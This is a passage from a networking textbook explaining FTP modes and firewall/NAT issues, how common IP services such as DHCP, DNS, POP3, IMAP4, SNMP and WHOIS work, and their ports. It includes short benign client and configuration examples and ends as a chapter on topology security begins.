This is where things get a bit weird. Loki and Thor still have an active session on ports 1038 and 21, as indicated in Figure 3.15. Figure 3.16 is a second, separate session running parallel to the one shown in Figure 3.15. This second session is initiated in order to transfer the actual file or data.

There is something else a bit odd about this connection: look closely at line number 7. Thor—not Loki—is actually initiating the TCP three-packet handshake in order to transfer the file information. While Loki was responsible for initiating the original FTP command session to port 21, Thor is actually the one initiating the FTP data session.

This means that in order to support FTP sessions to the Internet, we must allow connections to be established from Internet hosts on port 20 to our internal network. If our firewall device does not allow us to define a source port for inbound traffic (which some do not), we must leave all ports above 1023 completely open! Not exactly the most secure stance.
Passive FTP

There is also a second type of FTP transfer known as passive FTP (PASV FTP). Passive FTP is identical to standard FTP in terms of sending commands over port 21. The difference between PASV FTP and standard FTP lies in how the data session gets initiated. PASV FTP is the mode supported by most Web browsers.

Before transferring data, a client can request PASV mode transmission. If the FTP server acknowledges this request, the client is allowed to initiate the TCP three-packet handshake, instead of the server. Figure 3.17 shows a capture of two systems using PASV FTP. Packet 21 shows "This workstation" (the FTP client) requesting that PASV FTP be used. In packet 22, the FTP server responds, stating that PASV mode is supported.

Figure 3.17: A passive mode FTP session

Notice what occurs in packet 23. Our FTP client initiates the TCP three-packet handshake in order to transfer data. This fixes one problem but causes another. Since the client initiates the session, we can now close inbound access from port 20. This lets us tighten up our inbound security policy a bit. Note that to initiate this passive session, however, the client uses a random upper port number for both the source and the destination. This means that the port the client will use to transfer data can and will change from session to session. It also means that in order to support PASV FTP, I must allow outbound sessions to be established on all ports above 1023. Not a very good security stance if you are looking to control outbound Internet access (such as a policy forbidding Internet Quake games).
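Most FTP client libraries let you choose between the two modes. Here is a minimal sketch using Python's standard ftplib module; the host, account, and file name are hypothetical:

from ftplib import FTP

ftp = FTP('thor.foobar.com')               # command session to port 21
ftp.login('anonymous', 'jdoe@foobar.com')
ftp.set_pasv(True)    # PASV: the client initiates the data session
# ftp.set_pasv(False) # standard FTP: the server connects back from port 20
with open('patch.exe', 'wb') as f:
    ftp.retrbinary('RETR patch.exe', f.write)
ftp.quit()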
As if all this were not enough to deal with, administrators can run into another problem with FTP when they use a firewall or network address translation (NAT) device. The problem revolves around the fact that FTP uses two separate sessions.

Note: NAT allows you to translate IP addresses from private numbers to legal numbers. This is useful when the IP addresses you are using on your network were not assigned to you by your ISP. We will talk more about NAT when we discuss firewalls in Chapter 5.

While I am transferring a large file over the Internet (let's say the latest 60MB patch file from Microsoft), my control session to port 21 stays quiet. This session is not required to transmit any information during a file transfer until the transfer is complete. Once it is complete, the systems acknowledge over the control session that the file was in fact received in its entirety.

If it has taken a long time to transfer the file (say, over an hour), the firewall or NAT device may assume that the control session is no longer valid. Since it has seen no data pass between the two systems for a long period of time, the device assumes that the connection is gone and purges the session entry from its tables. This is a bad thing: once the file transfer is complete, the systems have no means to handshake to insure the file was received. The typical symptom of this problem is that the client transferring or receiving the file hangs at 99 percent complete.

Luckily, most vendors make this timeout setting adjustable. If you are experiencing such symptoms, check your firewall or NAT device to see if it has a TCP timeout setting. If so, simply increase the listed value. Most systems default to a timeout value of one hour.

Other IP Services

Many application services are designed to use IP as a transport. Some are designed to aid the end user in transferring information, while others have been created to support the functionality of IP itself. Some of the most common services are described below, including the transport used for data delivery and the well-known port number assigned to the service.

Boot Protocol (bootp) and Dynamic Host Configuration Protocol (DHCP)

There are three methods of assigning IP addresses to host systems:

Manual: The user manually configures an IP host to use a specific address.
Automatic: A server automatically assigns a specific address to a host during startup.
Dynamic: A server dynamically assigns free addresses from a pool to hosts during startup.

Manual assignment is the most time-consuming but the most fault tolerant. It requires that each IP host be configured with all the information the system requires to communicate using IP. Manual assignment is the most appropriate method for systems that must maintain the same IP address or systems that must be accessible even when the IP address server may be down. Web servers, mail servers, and any other servers providing IP services are usually manually configured for IP communications.

Bootp supports automatic address assignment. A table is maintained on the bootp server that lists each host's MAC number. Each entry also contains the IP address to be used by the system. When the bootp server receives a request for an IP address, it references its table and looks for the sending system's MAC number, returning the appropriate IP address for that system. While this makes management a little simpler, because all administration can be performed from a central system, the process is still time-consuming, because each MAC address must be recorded. It also does nothing to free up IP address space that may not be in use.

DHCP supports both automatic and dynamic IP address assignments. When addresses are dynamically assigned, the server issues IP addresses to host systems from a pool of available numbers. The benefit of a dynamic assignment over an automatic one is that only the hosts that require an IP address have one assigned. Once complete, the IP addresses can be returned to the pool to be issued to another host.

Note: The amount of time a host retains a specific IP address is referred to as the lease period. A short lease period insures that only systems requiring an IP address have one assigned. When IP is only occasionally used, a small pool of addresses can be used to support a large number of hosts.

The other benefit of DHCP is that the server can send more than just address information. The remote host can also be configured with its host name, default router, domain name, local DNS server, and so on. This allows an administrator to remotely configure IP services on a large number of hosts with a minimal amount of work. A single DHCP server is capable of servicing multiple subnets.

The only drawbacks with DHCP are

• Increased broadcast traffic (clients send an all-networks broadcast when they need an address)
• Address space instability if the DHCP server is shut down

On many systems, the tables that track who has been assigned which addresses are saved in memory only. When the system goes down, this table is lost. When you restart the system, IP addresses may be assigned to systems that were already leased to another system prior to the shutdown. If this occurs, you may need to renew the lease on all systems or wait until the lease time expires.

Note: Both bootp and DHCP use UDP as their communication transport. Clients transmit address requests from a source port of 68 to a destination port of 67.
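As a rough illustration, a dynamic scope on an ISC-style DHCP server is defined with just a few lines. The addresses and options below are hypothetical; check your own server's documentation for the exact syntax it expects:

# dhcpd.conf: one dynamic pool plus the extra configuration
# information mentioned above
subnet 10.2.2.0 netmask 255.255.255.0 {
    range 10.2.2.100 10.2.2.200;            # pool of free addresses
    option routers 10.2.2.1;                # default router
    option domain-name "foobar.com";
    option domain-name-servers 10.2.2.10;   # local DNS server
    default-lease-time 3600;                # one-hour lease period
}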
Domain Name Services (DNS)

DNS is responsible for mapping host names to IP addresses and vice versa. It is the service that allows you to connect to Novell's Web server by entering www.novell.com, instead of having to remember the system's IP address. All IP routing is done with addresses, not names. While IP systems do not use names when transferring information, names are easier for people to remember; DNS was developed to make reaching remote systems that much easier. DNS allows a person to enter an easy-to-remember name while allowing the computer to translate this into the address information it needs to route the requested data.

DNS follows a hierarchical, distributed structure. No single DNS server is responsible for keeping track of every host name on the Internet. Each system is responsible for only a portion of the framework.

Figure 3.18 shows an example of how DNS is structured. Visually it resembles a number of trees strapped to a pole and hanging upside down. The pole is not meant to represent the backbone of the Internet; it simply indicates that there is DNS connectivity between the different domains. The systems located just below the pole are referred to as the root name servers. Each root name server is responsible for one or more top-level domains. Examples of top-level domains are the .com, .edu, .org, .mil, or .gov found at the end of a domain name. Every domain that ends in .com is said to be part of the same top-level domain.

Figure 3.18: A visual representation of the hierarchical structure of DNS

The root name servers are responsible for keeping track of the DNS servers for each subdomain within a top-level domain. They do not know about individual systems within each subdomain, only the DNS servers that are responsible for them. Each subdomain DNS server is responsible for tracking the IP addresses for all the hosts within its domain.

Let's walk through an example to see how it works. Let's say you're part of the foobar.com domain. You are running a Web browser and have entered the following URL:

http://www.sun.com

Your system will first check its DNS cache (if it has one) to see if it knows the IP address for www.sun.com. If it does not, it forms a DNS query (a DNS query is simply a request for IP information) and asks one of the DNS servers within the foobar.com domain for the address. Let's assume the system it queries is ns.foobar.com.
If ns.foobar.com does not have this information cached, it also forms a DNS query and forwards the request to the root name server responsible for the top-level domain .com, because this is where the Sun domain is located.

The root name server will consult its tables and form a reply similar to this: "I do not know the IP address for www.sun.com. I do, however, know that ns.sun.com is responsible for all the hosts within the sun.com domain. Its IP address is 10.5.5.1. Please forward your query to that system." This reply is then sent to ns.foobar.com.

Ns.foobar.com now knows that if it needs to find a system within the sun.com domain, it needs to ask ns.sun.com. Ns.foobar.com caches this name server information and forwards the request to ns.sun.com.

Ns.sun.com will in turn consult its tables and look up the IP address for www.sun.com. Ns.sun.com will then forward the IP address to ns.foobar.com. Ns.foobar.com will then cache this address and forward the answer to your system. Your system can now use this IP address information to reach the remote Web server.

If you think that there is a whole lot of querying going on, then you have a good understanding of the process. The additional traffic is highly preferable, however, to the amount of overhead that would be required to allow a single system to maintain the DNS information for every system on the Internet.

As you may have noticed, DNS makes effective use of caching information during queries. This helps to reduce traffic when looking up popular sites. For example, if someone else within foobar.com now attempts to reach www.sun.com, the IP address for this system has already been cached by ns.foobar.com, which can answer the query directly.

The amount of time that ns.foobar.com remembers this information is determined by the time to live (TTL) set for this address. The TTL is set by the administrator responsible for managing the remote name server (in this case ns.sun.com). If www.sun.com is a stable system, this value may be set at a high value, such as 30 days. If it is expected that the IP address for www.sun.com is likely to change frequently, the TTL may be set to a lower value, such as a few hours.
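From a program's point of view, all of this recursion is hidden behind a single call to the local resolver. For example, in Python (the address shown in the comment is only a placeholder):

import socket

# The resolver performs the query chain described above and honors
# any cached answers until their TTL expires.
print(socket.gethostbyname('www.sun.com'))   # e.g., '192.9.9.1'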
Caveats about the TTL Settings

Let's look at an example to see why it is important to properly manage your TTL settings. Let's say the mail relay for foobar.com is run from the system mail.foobar.com. Let's also assume that a high TTL value of 30 days has been set in order to reduce the number of DNS queries entering the network from the Internet. Finally, let's assume that your network has changed ISPs and you have been assigned a new set of IP numbers to use when communicating with the Internet.

The network is readdressed, and the changeover takes place. Immediately users begin to receive phone calls from people saying that mail sent to their address is being returned with a delivery failure notice. The failure is intermittent: some mail gets through, while other messages fail.

What went wrong? Since the TTL value has been set for 30 days, remote DNS servers will remember the old IP address until the TTL expires. If someone sent mail to the foobar.com domain the day before the changeover, it may be 30 days before their DNS server creates another query and realizes that the IP address has changed! Unfortunately, the domains most likely affected by this change are the ones you exchange mail with the most.

There are two ways to resolve this failure:

1. Ignore it and hide under your desk. Once the TTL expires, mail delivery will return to normal.
2. Contact the DNS administrator for each domain you exchange mail with and ask them to reset their DNS cache. This will force the remote system to look up the address the next time a mail message must be sent. This option is not only embarrassing—it may be impossible when dealing with large domains such as AOL or CompuServe.

Avoiding this type of failure takes some fundamental planning. Simply turn down the TTL value to an extremely short period of time (like one hour) at least 30 days prior to the changeover. This forces remote systems to cache the information for only a brief amount of time. Once the changeover is complete, the TTL can be adjusted back up to 30 days to help reduce traffic. Thirty days is a good TTL value for systems that are not expected to change their host name or address.

Note: DNS uses both the TCP and UDP transports when communicating. Both use a destination port of 53.

Hypertext Transfer Protocol (HTTP)

HTTP is used in communications between Web browsers and Web servers. It differs from most services in that it does not create and maintain a single session while a user is retrieving information from a server. Every request for information—text, graphics, or sound—creates a separate session, which is terminated once that request is completed. A Web page with lots of graphics needs to have multiple simultaneous connections created in order to be loaded onto a browser. It is not uncommon for a Web browser to create 10, 20, or even 50 sessions with a Web server just to read a single page.

Since version 1.0, HTTP has included Multipurpose Internet Mail Extensions (MIME) to support the negotiation of data types. This has helped HTTP to become a truly cross-platform service, since MIME allows the Web browser to inform the server what type of file formats it can support. MIME also allows the server to alert the Web browser as to what type of data it is about to receive. This allows the browser to select the correct, platform-specific viewing or playing software for the data it is about to receive.

Note: HTTP uses the TCP transport and a destination port of 80 when communicating.
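The one-request-per-session behavior is easy to see if you speak HTTP/1.0 by hand. A short Python sketch follows; the host is a placeholder, and any Web server will do:

import socket

# One session, one request: the server closes the connection after
# sending its reply, so a page with 10 graphics needs 11 sessions.
s = socket.create_connection(('www.sun.com', 80))
s.sendall(b'GET / HTTP/1.0\r\nHost: www.sun.com\r\n\r\n')
reply = b''
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    reply += chunk
s.close()
print(reply.split(b'\r\n')[0])  # status line, e.g., b'HTTP/1.0 200 OK'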
Post Office Protocol (POP)

Post Office Protocol is typically used when retrieving mail from a UNIX shell account. It allows a user to read her mail without creating a telnet connection to the system. When you dial in to your ISP in order to retrieve your mail, you are typically using the POP protocol to retrieve mail from a UNIX system.

When a UNIX user receives an e-mail message, it is typically stored in the /var/spool/mail directory. Normally this message could be retrieved remotely by telnetting to the system and running the mail command. While it is a useful utility, mail does not have much of a user interface. To the inexperienced user, the commands can seem cryptic and hard to remember.

POP allows a user to connect to the system and retrieve her mail using her username and password. POP does not provide shell access; it simply retrieves any mail messages the user may have pending on the system.

There are a variety of mail clients available that support POP (POP3 is the latest version), so the user has a good amount of freedom to choose the e-mail client she likes best.

When using POP3, the user has the option to either leave her messages up on the POP server and view them remotely (online mail) or download the messages to the local system and read them offline (offline mail). Leaving the messages on the server allows the system administrator to centrally back up everyone's mail when backing up the server. The drawback, however, is that if the user never deletes her messages (I've seen mailboxes with over 12,000 messages), the load time for the client can be excruciatingly long. Because a copy of each message is left up on the server, all messages must be downloaded every time the client connects.

The benefit of using the POP client in offline mode is that local folders can be created to organize old messages. Because messages are stored locally, the load time for many messages is relatively short. This can provide a dramatic improvement in speed when the POP server is accessed over a dial-up connection. Note that only local folders can be used. POP3 does not support the use of global or shared folders. The downside to offline mode is that each local system must be backed up to insure recovery in the event of a drive failure. Most POP clients operate in offline mode.

One of POP3's biggest drawbacks is that it does not support the automatic creation of global address books. Only personal address books can be used. For example, if your organization is using a POP3 mail system, you have no way of automatically viewing the addresses of other users on the system. This leaves you with two options:

• You can manually discover the other addresses through some other means and add them to your personal address book.
• You can require that the system administrator generate a list of e-mail addresses on the system and e-mail this list to all users. Each user can then use the file to update his or her personal address book.

Neither option is particularly appealing, so POP is best suited for the home Internet user who does not need sharable address books or folders. For business use, the IMAP4 protocol (discussed in the next section) is more appropriate.

When a message is delivered by a POP3 client, the client forwards the message either back to the POP server or on to a central mail relay. Which of these is performed depends on how the POP client is configured. In either case, the POP client uses Simple Mail Transfer Protocol (SMTP, discussed in an upcoming section) when delivering new messages or replies. This forwarding system, not the POP client, is ultimately responsible for the delivery of the message.

By using a forwarding mail relay, the POP client can disconnect from the network before the message is delivered to its final destination. While most SMTP messages are delivered very quickly (in less than one second), a busy mail system can take 10 minutes or more to accept a message. Using a forwarding system helps to reduce the amount of time a remote POP client is required to remain dialed in.

If the mail relay encounters a problem (such as a typo in the recipient's e-mail address) and the message cannot be delivered, the POP client will receive a delivery failure notice the next time it connects to the POP server.

Note: POP3 uses TCP as a transport and communicates using a destination port of 110.
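The protocol itself is simple enough to sketch with Python's standard poplib module. The host and account shown are hypothetical:

import poplib

pop = poplib.POP3('mail.foobar.com')   # connects to TCP port 110
pop.user('jdoe')
pop.pass_('secret')
count, size = pop.stat()               # messages waiting on the server
print(count, 'messages,', size, 'bytes')
response, lines, octets = pop.retr(1)  # download message 1
print(b'\n'.join(lines).decode())
# pop.dele(1)  # a client in offline mode would now delete the original
pop.quit()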
Internet Message Access Protocol, Version 4 (IMAP4)

IMAP was designed to be the next evolutionary step from the Post Office Protocol. While it has the same features as POP, it includes many more, which allow it to scale more easily in a workgroup environment.

As with POP3, the user has the option to either leave messages up on the server and view them remotely (online mail) or download the messages to the local system and read them offline (offline mail). IMAP, however, supports a third connection mode, referred to as disconnected.

In online mode, all messages are stored on the IMAP server. While it can be time-consuming to start up a POP mail client in online mode if many messages are involved, IMAP avoids this problem through the use of flags.

As you've seen, when a POP client connects to a POP server, the client will simply authenticate and begin to download messages. All messages on the server are considered to be new and unread, which means that the user's entire inbox must be transferred before messages can be viewed or read. When an IMAP client connects to an IMAP server, however, it authenticates and checks the flag status on existing messages. Flagging allows a message to be marked as "seen," "deleted," or "answered." This means that an IMAP client can be configured to collect only messages that have not been seen, avoiding the transfer of the entire mailbox.

In offline mode, connection time can be reduced through the use of previewing. Previewing allows the user to scan the header information of all new messages without actually transferring them to her local system. If the user is looking to remotely retrieve only a specific message, she can choose which messages to receive and which messages to leave on the server as unread. The user can also delete messages based upon the header information or file size without having to transfer them to the local system first. This can be a real time-saver if you usually retrieve your mail remotely and you receive a lot of unsolicited advertisements.

As noted, IMAP includes a third connection mode not supported by POP, referred to as disconnected. (Someone certainly had a twisted sense of humor when they called it that—you can just see the poor support people pulling their hair out over this one: "I disconnected my computer just like the instructions said, so how come I can't see my mail?") When a remote IMAP client is operating in disconnected mode, it retrieves only a copy of all new messages. The originals are left up on the IMAP server. The next time the client connects to the system, the server is synchronized with any changes made to the cached information. This mode has a few major benefits:

• Connection time is minimized, reducing network traffic and/or dial-in time.
• Messages are centrally located so they can be backed up easily.
• Because all messages are server-based, mail can be retrieved from multiple clients and/or multiple computers.

The last benefit is extremely useful in an environment where people do not always work from the same computer.
For example, an engineer who works from home a few days a week can easily keep his mail synchronized between his home and work computers. When working in offline mode, as most POP clients do, mail retrieved by the engineer's work system would not be viewable on his home system. An IMAP client does not have this limitation.

Another improvement over POP is that IMAP supports the writing of messages up to the server. This allows a user to have server-based folders instead of just local ones. These folders can be synchronized in disconnected mode, as well.

IMAP also supports group folders. This allows mail users to have bulletin board areas where messages can be posted and viewed by multiple people. This functionality is similar to news under NNTP (a description of NNTP and news follows). Group folders provide an excellent means of sharing information. For example, the Human Resources department could set up a group folder for corporate policy information. This would reduce the need to create printed manuals.

Tip: If you are using IMAP or if your current e-mail system supports group folders, create one entitled computer support or something similar. In it you can post messages providing support for some of your most common support calls. This can help reduce the number of support calls received and provide the user with written directions about how to work through a problem. You can even add screen captures, which can make resolving the problem much easier than walking through it over the phone would.

IMAP has been designed to integrate with the Application Configuration Access Protocol (ACAP). ACAP is an independent service that allows a client to access configuration information and preferences from a central location. Support for ACAP enhances the portability of IMAP even further.

For example, our engineer who works from home a few days a week could also store his personal address book and configuration information up on the server. If he is at work and adds a new name and e-mail address to his address book, that name would be available when he is using his home system. This would not be true with POP, where each client has a separate address book saved on each local system. ACAP also insures that any configuration changes take effect on both systems.

ACAP also gives mail administrators some control to set up corporate standards for users when accessing mail. For example, the administrator can set up a global address book that everyone can access.

Note: IMAP uses TCP as a transport with a destination port of 143.
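A minimal sketch with Python's standard imaplib module shows the flag-based behavior described above; the host and account are hypothetical:

import imaplib

imap = imaplib.IMAP4('mail.foobar.com')  # connects to TCP port 143
imap.login('jdoe', 'secret')
imap.select('INBOX')
# Ask the server for messages that have not been flagged as seen, so
# only new mail is transferred rather than the entire mailbox.
status, data = imap.search(None, 'UNSEEN')
for num in data[0].split():
    status, msg = imap.fetch(num, '(BODY.PEEK[HEADER])')  # preview headers only
    print(msg[0][1].decode())
imap.logout()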
Network File System (NFS)

NFS provides access to remote file systems. The user can access the remote file system as if the files were located on the local system. NFS provides file access only. This means that other functionality, such as processor time or printing, must be provided by the local system.

NFS requires configuration changes on both the server and the client. On the server, the file system to be shared must first be exported. This is done by defining which files are to be made sharable. This can be a single directory or an entire disk. You must also define who has access to this file system.

On the client side, the system must be configured to mount the remote file system. On a UNIX machine this is done by creating an entry in the system's /etc/fstab file, indicating the name of the remote system, the file system to be mounted, and where it should be placed on the local system. In the UNIX world, this is typically a directory structure mounted under an existing directory. In the DOS world, the remote file system may be assigned a unique drive letter. DOS and Windows require third-party software in order to use NFS.

While it offers a convenient way to share files, NFS suffers from a number of functional deficiencies. File transfer times are slow when compared to FTP or NetWare's NCP protocol. NFS has no file-locking capability to insure that only one user can write to a file. As if this were not bad enough, NFS makes no assurances that the information has been received intact. I've seen situations where entire directories have been copied to a remote system using NFS and have become corrupted in transit. Because NFS does not check data integrity, the errors were not found until the files were processed.

Note: NFS uses the UDP transport and communicates using port 2049.
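For reference, a client-side mount of the kind described above is a single line in /etc/fstab. The host and paths here are hypothetical, and mount option names vary among UNIX flavors:

# remote file system           mount point  type  options  dump pass
thor.foobar.com:/export/home   /mnt/home    nfs   rw,soft  0    0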
Network News Transfer Protocol (NNTP)

NNTP is used in the delivery of news. News is very similar in functionality to e-mail, except messages are delivered to newsgroups, not end users. Each newsgroup is a storage area for messages that follow a common thread or subject. Instead of a mail client, a news client is used to read messages that have been posted to different subject areas.

For example, let's say you are having trouble configuring networking on your NetWare server. You could check out the messages that have been posted to the newsgroup comp.os.netware.connectivity to see if anyone else has found a solution to the same problem. There are literally tens of thousands of newsgroups on a wide range of subjects. My own personal favorites are

comp.protocols
alt.clueless
alt.barney.dinosaur.die.die.die

In order to read news postings, you must have access to a news server. News servers exchange messages by relaying any new messages they receive to other servers. The process is a bit slow: it can take three to five days for a new message to be circulated to every news server.

News is very resource intensive. It's not uncommon for a news server to receive several gigabits of information per week. The processes required to send, receive, and clean up old messages can eat up a lot of CPU time, as well.

News has dwindled in appeal over the last few years due to an activity known as spamming. Spamming is the posting of unsolicited or off-subject messages. For example, at the time of this writing comp.os.netware.connectivity contains 383 messages. Of these, 11 percent are advertisements for get-rich-quick schemes, 8 percent are ads for computer-related hardware or services, 6 percent are postings describing the sender's opinion on someone or something using many superlatives, and another 23 percent are NetWare-related but have nothing to do with connectivity. This means that only slightly more than half the postings are actually on-topic. For some groups the percentages are even worse.

Note: NNTP uses TCP as a transport and port 119 for all communications.

NetBIOS over IP

NetBIOS over IP is not a service per se, but it does add session layer support to enable the encapsulation of NetBIOS traffic within an IP packet. This is required when using Windows NT or Samba, which use NetBIOS for file and printer sharing. If IP is the only protocol bound to an NT server, the server is still using NetBIOS for file sharing via encapsulation.

Samba is a suite of programs that allows UNIX file systems and printers to be accessed as shares. In effect, this makes the UNIX system appear to be an NT server. Clients can be other UNIX systems (running the Samba client) or Windows 95/98/NT/2000 systems. The Windows clients do not require any additional software, because they use the same configuration as when they are communicating with an NT/2000 server.

The source code for Samba is available as freeware on the Internet. More than 15 different flavors of UNIX are supported.

Note: When NetBIOS is encapsulated within IP, both TCP and UDP are used as a transport. All communications are conducted on ports 137–139.

Simple Mail Transfer Protocol (SMTP)

SMTP is used to transfer mail messages between systems. SMTP uses a message-switched type of connection: each mail message is processed in its entirety before the session between two systems is terminated. If more than one message must be transferred, a separate session must be established for each mail message.

SMTP is capable of transferring ASCII text only. It does not have the ability to support rich text or transfer binary files and attachments. When these types of transfers are required, an external program is needed to first translate the attachment into an ASCII format.

The original programs used to provide this functionality were uuencode and uudecode. A binary file would first be processed by uuencode to translate it into an ASCII format. The file could then be attached to a mail message and sent. Once received, the file would be processed through uudecode to return it to its original binary format.

Uuencode/uudecode has largely been replaced by MIME. While MIME performs the same translating duties, it encodes the data more efficiently. The result is smaller attachments, which produce faster message transfers with reduced overhead. Apple computers use an application called BinHex, which has the same functionality as MIME. MIME is now supported by most UNIX and PC mail systems.

Uuencode/uudecode, BinHex, and MIME are not compatible. If you can exchange text messages with a remote mail system but attachments end up unusable, you are probably using different translation formats. Many modern mail gateways provide support for both uuencode/uudecode and MIME to eliminate such communication problems. Some even include support for BinHex.

Note: SMTP uses the TCP transport and destination port 25 when creating a communication session.
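Python's standard email package can build such a message, translating a binary attachment into an ASCII (base64) body part; the addresses and file name below are hypothetical:

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication

msg = MIMEMultipart()
msg['From'] = 'jdoe@foobar.com'
msg['To'] = 'user@sun.com'
msg['Subject'] = 'Patch file attached'
msg.attach(MIMEText('The patch you asked for is attached.'))
with open('patch.exe', 'rb') as f:
    # Encoded as base64, so the result is plain ASCII that SMTP can carry
    msg.attach(MIMEApplication(f.read(), Name='patch.exe'))
print(msg.as_string()[:200])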
Simple Network Management Protocol (SNMP)

SNMP is used to monitor and control network devices. The monitoring or controlling station is referred to as the SNMP management station. The network devices to be controlled are required to run SNMP agents. The agents and the management station work together to give the network administrator a central point of control over the network.

Note: The SNMP agent provides the link into the networking device. The device can be a manageable hub, a router, or even a server. The agent uses both static and dynamic information when reporting to the management station.

The static information is data stored within the device in order to identify it uniquely. For example, the administrator may choose to store the device's physical location and serial number as part of the SNMP static information. This makes it easier to identify which device you're working with from the SNMP management station.

The dynamic information is data that pertains to the current state of the device. For example, port status on a hub would be considered dynamic information, as the port may be enabled or disabled depending on whether it is functioning properly.

The SNMP management station is the central console used to control all network devices that have SNMP agents. The management station first learns about a network device through the use of a management information base (MIB). The MIB is a piece of software supplied by the network device vendor, usually on floppy disk. When the MIB is added to the management station, it teaches the management station about the network device. This helps to insure that SNMP management stations created by one vendor will operate properly with network devices produced by another.

Information is usually collected by the SNMP management station through polling. The SNMP management station will issue queries at predetermined intervals in order to check the status of each network device. SNMP supports only two commands for collecting information: get and getnext. The get command allows the management station to retrieve information on a specific operating parameter. For example, the management station may query a router to report on the current status of one of its ports. The getnext command is used when a complete status report will be collected from a device. Instead of forcing the SNMP management station to issue a series of specific get commands, getnext can be used to sequentially retrieve each piece of information a device can report on.

SNMP also allows for the controlling of network devices through the set command. The set command can be used to alter some of the operational parameters on a network device. For example, if your get command reported that port 2 on the router was disabled, you could issue a set command to the router to enable the port.

SNMP typically does not offer the same range of control as a network device's management utility. For example, while you may be able to turn ports on and off on your router, you would probably be unable to initialize IP networking and assign an IP address to the port. The amount of control available through SNMP is limited by which commands are included in the vendor's MIB, as well as by the command structure of SNMP itself. The operative word in SNMP is "simple." SNMP provides only a minimal amount of control over network devices.

While most reporting is done by having the SNMP management station poll network devices, SNMP does allow network devices to report critical events immediately back to the management station. These messages are called traps. Traps are sent when an event occurs that is important enough not to wait until the device is again polled. For example, your router may send a trap to the SNMP management console if it has just been power cycled. Because this event will have a grave impact on network connectivity, it is reported to the SNMP management station immediately instead of waiting until the device is again polled.

Note: SNMP uses the UDP transport and destination ports 161 and 162 when communicating.
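With the command-line tools from a recent net-snmp release (one common implementation; older versions pass the community string differently), the get and set operations described above look roughly like this. The host name and community strings are hypothetical:

snmpget -v 2c -c public router.foobar.com sysUpTime.0
snmpget -v 2c -c public router.foobar.com ifOperStatus.2
snmpset -v 2c -c private router.foobar.com ifAdminStatus.2 i 1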
Telnet

Telnet is used when a remote communication session is required with some other system on the network. Its functionality is similar to a mainframe terminal or remote control session. The local system becomes little more than a dumb terminal providing screen updates only. The remote system supplies the file system and all processing time required when running programs.

Note: Telnet uses the TCP transport and destination port 23 when creating a communication session.

WHOIS

WHOIS is a utility used to gather information about a specific domain. The utility usually connects to the system rs.internic.net and displays administrative contact information as well as the root servers for a domain. This is useful when you wish to find out what organization is using a particular domain name. For example, typing the command

whois sun.com

will produce the following information regarding the domain:

Sun Microsystems Inc. (SUN) SUN.COM 192.9.9.1
Sun Microsystems, Inc. (SUN-DOM) SUN.COM

If you performed a further search by entering the command

whois sun-dom

additional information would be produced:

Sun Microsystems, Inc. (SUN-DOM)
2550 Garcia Avenue
Mountain View, CA 94043
Domain Name: SUN.COM
Administrative Contact, Technical Contact, Zone Contact:
Lowe, Fredrick (FL59) Fred.Lowe@SUN.COM
408-276-4199
Record last updated on 21-Nov-96.
Record created on 19-Mar-86.
Database last updated on 16-Jun-97 05:26:09 EDT.
Domain servers in listed order:
NS.SUN.COM 192.9.9.3
VGR.ARL.MIL 128.63.2.6, 128.63.16.6, 128.63.4.4
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

WHOIS can be an extremely powerful troubleshooting tool: you now know who is responsible for maintaining the domain, how to contact them, and which systems are considered to be primary name servers. You could then use a DNS tool such as nslookup to find the IP addresses of Sun's mail systems or even their Web server.

Note: WHOIS uses the TCP transport and destination port 43 when creating a communication session.
IRC

The IRC (Internet Relay Chat) protocol allows clients to communicate in real time. IRC is made up of various separate networks (known as nets) of IRC servers. Users run a client that connects them to a server on one of the nets. The server relays information to and from other servers on the same net. Once connected to an IRC server, a user is presented with a list of one or more topical channels. Channel names usually begin with a #, such as #irchelp, and since all servers on a given net share the same list of channels, users connected to any server on that net can communicate with one another.

Note: Channels that begin with a & instead of a # are local to a given server only and are not shared with other servers on the net.

Each IRC client is distinguished from other clients by a unique nickname (or nick). Servers store additional information about each client, including the real name of the host that the client is running on, the username of the client on that host, and the server to which the client is connected.

Operators are clients that have been given the ability to perform maintenance on the IRC nets, such as disconnecting and reconnecting servers as needed to correct for network routing problems. Operators can also forcibly remove other clients from the network by terminating their connection. Operators can be assigned to a server or just to a channel, and they are identified by an @ symbol next to their nick.

Note: IRC can use both TCP and UDP as transports, but most modern IRC servers listen on TCP ports 6667–7000.
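Underneath the client software, an IRC session is plain text over the TCP connection. A hypothetical registration per RFC 1459 looks like this, with the server's replies omitted and all names made up:

NICK jdoe
USER jdoe localhost irc.foobar.net :John Doe
JOIN #irchelp
PRIVMSG #irchelp :Hello, everyone.
QUIT :Leaving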
Upper Layer Communications

Once we get above the session layer, our communications become pretty specific to the program we're using. The responsibilities of the presentation and application layers are more a function of the type of service requested than of the underlying protocol in use. Data translation and encryption are considered portable features.

Note: Portable means that these features can be applied easily to different services without regard for the underlying protocol. It does not matter if I'm using IP or IPX to transfer my data; the ability to leverage these features will depend on the application in use.

For example, Lotus Notes has the ability to encrypt mail messages prior to transmission. This activity is performed at the presentation layer of the program. It does not matter if I'm connecting to my mail system via TCP, SPX, or a modem. The encryption functionality is available with all three protocols, because the functionality is made available by the program itself. Lotus Notes is not dependent on the underlying protocol.

Summary

In this chapter, we began by discussing the anatomy of an Ethernet frame and how systems on a local Ethernet segment communicate. We also covered how routing is used to assist communication in large networking environments. From there we looked at the different methods of connection establishment and finished off the chapter by discussing IP services. For a more in-depth look at any of these technologies, you might want to refer to Multiprotocol Network Design and Troubleshooting (Sybex, 1997).

In the next chapter, we will begin to look at some of the insecurities involved in everyday communications. We will look at how building security into your core network design can not only improve performance (always a good thing)—it can make your data less susceptible to attack, as well.

Chapter 4: Topology Security

In this chapter, we will look at the communication properties of network transmissions. You will also see what insecurities exist in everyday network communications—and how you can develop a network infrastructure that alleviates some of these problems.

Understanding Network Transmissions

It is no accident that the National Security Agency, which is responsible for setting the encryption standards for the U.S. government, is also responsible for monitoring and cracking encrypted transmissions that are of interest to the government. In order to know how to make something more secure, you must understand what vulnerabilities exist and how they can be exploited.

This same idea applies to network communications. In order to design security into your network infrastructure, you must understand how networked systems communicate with each other. Many exploits leverage basic communication properties. If you are aware of these communication properties, you can take steps to insure that they are not exploited.

Digital Communications

